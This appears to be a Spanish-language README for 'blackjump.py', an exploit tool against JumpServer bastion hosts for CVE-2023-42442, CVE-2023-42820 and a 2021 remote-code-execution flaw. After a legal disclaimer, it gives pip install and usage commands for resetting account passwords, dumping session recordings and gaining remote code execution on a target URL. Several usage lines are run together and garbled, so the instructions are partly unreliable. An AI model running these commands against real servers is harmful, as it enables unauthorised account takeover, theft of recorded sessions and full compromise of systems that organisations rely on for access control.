
Explotación integral no autorizada de JumpServer Bastion, Exploit for CVE-2023-42442 / CVE-2023-42820 / RCE 2021
Descargo de responsabilidad: esta herramienta está destinada únicamente a actividades legítimas y autorizadas de construcción de seguridad empresarial. Al utilizar esta herramienta para realizar pruebas, debe asegurarse de que dicha actividad cumple con las leyes y regulaciones locales y de que ha obtenido la autorización suficiente. No la utilice contra objetivos no autorizados.
Si lleva a cabo cualquier acto ilegal durante el uso de esta herramienta, deberá asumir las consecuencias correspondientes; no asumiremos ninguna responsabilidad legal ni solidaria.
Explotación integral de vulnerabilidades del bastión JumpServer
python3 -m pip install -r requirements.txt
--user y --emailpython3 blackjump.py reset https://vulerability

<uuid4>.tar del directorio output/ en el reproductor de JumpServer para reproducirlopython3 blackjump.py dump https://vulerability
e
python3 blackjump.py rce http(s)://vulerability

python3 blackjump.py {reset,dump,rce} -h